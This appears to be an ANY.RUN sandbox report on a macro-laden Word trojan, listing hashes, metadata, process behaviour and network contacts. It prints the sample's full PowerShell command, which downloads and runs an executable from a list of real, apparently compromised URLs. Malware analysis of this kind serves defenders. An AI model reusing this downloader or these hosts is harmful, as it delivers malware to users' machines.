analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

DieKlage-01092020-326885536.doc

Full analysis: https://app.any.run/tasks/5b1bed2d-4473-4783-8ffd-ea780219083d
Verdict: Malicious activity
Threats:

Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email.

Malware Trends Tracker     >>>
Analysis date: October 20, 2020, 08:03:00
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
macros-on-close
maldoc-55
trojan
opendir
Indicators:
MIME: application/vnd.openxmlformats-officedocument.wordprocessingml.document
File info: Microsoft Word 2007+
MD5:

B8D08D412A4E2460E33A61433ED183AA

SHA1:

1B2BA0005E601B4153E422DCDC66F0A5AD3C9982

SHA256:

CA94ABF398DF4677EA56D197B3C8756D3E7EFAD08E38D95B48A3A3BF15AE9FBE

SSDEEP:

1536:p+xp5P4yD6IMKPpY689zYhM7ZgzPYavEW++8U5KSFYqRYAZlPHvHkVfWtW:pi5PFoHmhcAY2+g5vt/vEWW

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 1944)

    • Executes PowerShell scripts

      • cmd.exe (PID: 3336)

  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 4072)

    • Starts CMD.EXE for commands execution

      • WScript.exe (PID: 1436)

    • Creates files in the program directory

      • WINWORD.EXE (PID: 1944)

    • Executes scripts

      • explorer.exe (PID: 3612)

    • Executed via COM

      • explorer.exe (PID: 3612)

    • Executes application which crashes

      • powershell.exe (PID: 4072)

  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 1944)

    • Creates files in the user directory

      • WINWORD.EXE (PID: 1944)

    • Reads settings of System Certificates

      • powershell.exe (PID: 4072)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.docm | Word Microsoft Office Open XML Format document (with Macro) (53.6)
.docx | Word Microsoft Office Open XML Format document (24.2)
.zip | Open Packaging Conventions container (18)
.zip | ZIP compressed archive (4.1)

EXIF

XML

BaseTarget: C:\ProgramData\jKLMJKGtftftyJHGFTYDA.vbs
AppVersion: 14
HyperlinksChanged: No
SharedDoc: No
CharactersWithSpaces: 1
LinksUpToDate: No
Company: SPecialiST RePack
TitlesOfParts: -
HeadingPairs:
  • Название
  • 1
ScaleCrop: No
Paragraphs: 1
Lines: 1
DocSecurity: None
Application: Microsoft Office Word
Characters: 1
Words: -
Pages: 1
TotalEditTime: 2 minutes
Template: Normal.dotm
ModifyDate: 2020:09:01 23:12:00Z
CreateDate: 2020:09:01 23:10:00Z
RevisionNumber: 4
LastModifiedBy: Пользователь Windows

XMP

Creator: Пользователь Windows

ZIP

ZipFileName: [Content_Types].xml
ZipUncompressedSize: 1740
ZipCompressedSize: 447
ZipCRC: 0x38b3daca
ZipModifyDate: 1980:01:01 00:00:00
ZipCompression: Deflated
ZipBitFlag: 0x0006
ZipRequiredVersion: 20
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
45
Monitored processes
8
Malicious processes
4
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe no specs explorer.exe no specs explorer.exe no specs wscript.exe no specs cmd.exe no specs powershell.exe ntvdm.exe no specs timeout.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1944"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\DieKlage-01092020-326885536.doc.docm"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
3864explorer.exe C:\ProgramData\jKLMJKGtftftyJHGFTYDA.vbsC:\Windows\explorer.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Explorer
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3612C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -EmbeddingC:\Windows\explorer.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Explorer
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1436"C:\Windows\System32\WScript.exe" "C:\ProgramData\jKLMJKGtftftyJHGFTYDA.vbs" C:\Windows\System32\WScript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
3336cmd /c ""C:\ApplesHelper\HGFTYUGYtyftTDFTYFYF.cmd" "C:\Windows\System32\cmd.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
4072POWerShell Foreach($url in @('http://rodrigodecamargo.com.br/vhtderi/555555555.png','http://www.lelamantin.fr/uboljzeqfb/555555555.png','http://somethingspecialrd.com/emdnfin/555555555.png','http://www.intiming.it/zopnivucop/555555555.png','http://funminews.com/tdtmxmcjtkqo/555555555.png','http://lesehanpelangi.com/vswrdyzgo/555555555.png','http://anamtaexports.in/gbfrctzj/555555555.png','http://ebooks.libraryrule.com/ttfzyugewvft/555555555.png','http://the-lobby.org/xqjzx/555555555.png','http://www.biocosmeticashop.com/tftkbe/555555555.png','http://birlafincorp.com/xoygkcfaea/555555555.png','http://shainasaw.com/bvjlok/555555555.png','http://www.hygienicwallcladding.com/ucbucwmtfkan/555555555.png','http://marudhralive.com/ggyofqrt/555555555.png','http://dienmayhoatan.com/fmyctrjeqrxw/555555555.png')) { try{$path = 'C:\ApplesHelper\KLHutufguyguyfgxdfg.exe'; (New-Object Net.WebClient).DownloadFile($url.ToString(), $path);saps $path; break;}catch{write-host $_.Exception.Message}}C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2620"C:\Windows\system32\ntvdm.exe" -i1 C:\Windows\system32\ntvdm.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
NTVDM.EXE
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1296TIMEOUT /T 10 C:\Windows\system32\timeout.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
timeout - pauses command processing
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 225
Read events
976
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
4
Unknown types
3

Dropped files

PID
Process
Filename
Type
1944WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR3C62.tmp.cvr
MD5:
SHA256:
1944WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1C27C76C.jpeg
MD5:
SHA256:
1944WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{11EEC6EE-DC08-47F0-A8B3-E8918DEEAD92}.tmp
MD5:
SHA256:
1944WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{78052BA2-9F1F-46A4-A016-BF9C27D882DD}.tmp
MD5:
SHA256:
1944WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DFED5644E9AC6913E6.TMP
MD5:
SHA256:
1944WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{C3732D9F-A45C-494C-8F92-F76748D80BF1}.tmp
MD5:
SHA256:
4072powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FRHQE0Q5LA8J7KK1HTHS.temp
MD5:
SHA256:
2620ntvdm.exeC:\Users\admin\AppData\Local\Temp\scs25F7.tmp
MD5:
SHA256:
2620ntvdm.exeC:\Users\admin\AppData\Local\Temp\scs2617.tmp
MD5:
SHA256:
4072powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:91E6FD459449D894E9B434F085A75F9C
SHA256:D7F710D6BA838016DDA48B25EB5D4F9AB3A526B58A71BB13502923BD61E51E37
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
9
DNS requests
8
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4072
powershell.exe
GET
301
108.167.132.112:80
http://rodrigodecamargo.com.br/vhtderi/555555555.png
US
malicious
4072
powershell.exe
GET
302
209.99.40.222:80
http://lesehanpelangi.com/vswrdyzgo/555555555.png
US
malicious
4072
powershell.exe
GET
404
74.220.207.171:80
http://funminews.com/tdtmxmcjtkqo/555555555.png
US
html
315 b
malicious
4072
powershell.exe
GET
404
173.254.28.216:80
http://somethingspecialrd.com/emdnfin/555555555.png
US
html
315 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4072
powershell.exe
108.167.132.112:80
rodrigodecamargo.com.br
CyrusOne LLC
US
malicious
4072
powershell.exe
104.18.58.20:443
www.steersearch.com
Cloudflare Inc
US
suspicious
4072
powershell.exe
209.99.40.222:80
lesehanpelangi.com
Confluence Networks Inc
US
malicious
4072
powershell.exe
37.59.236.156:80
www.intiming.it
OVH SAS
FR
malicious
4072
powershell.exe
213.186.33.24:443
www.lelamantin.fr
OVH SAS
FR
malicious
4072
powershell.exe
173.254.28.216:80
somethingspecialrd.com
Unified Layer
US
malicious
4072
powershell.exe
213.186.33.24:80
www.lelamantin.fr
OVH SAS
FR
malicious
4072
powershell.exe
74.220.207.171:80
funminews.com
Unified Layer
US
malicious

DNS requests

Domain
IP
Reputation
rodrigodecamargo.com.br
  • 108.167.132.112
malicious
www.rodrigodecamargo.com.br
  • 108.167.132.112
malicious
www.lelamantin.fr
  • 213.186.33.24
malicious
somethingspecialrd.com
  • 173.254.28.216
whitelisted
www.intiming.it
  • 37.59.236.156
malicious
funminews.com
  • 74.220.207.171
malicious
lesehanpelangi.com
  • 209.99.40.222
malicious
www.steersearch.com
  • 104.18.58.20
  • 104.18.59.20
  • 172.67.219.128
unknown

Threats

Found threats are available for the paid subscriptions
5 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
DieKlage-01092020-326885536.doc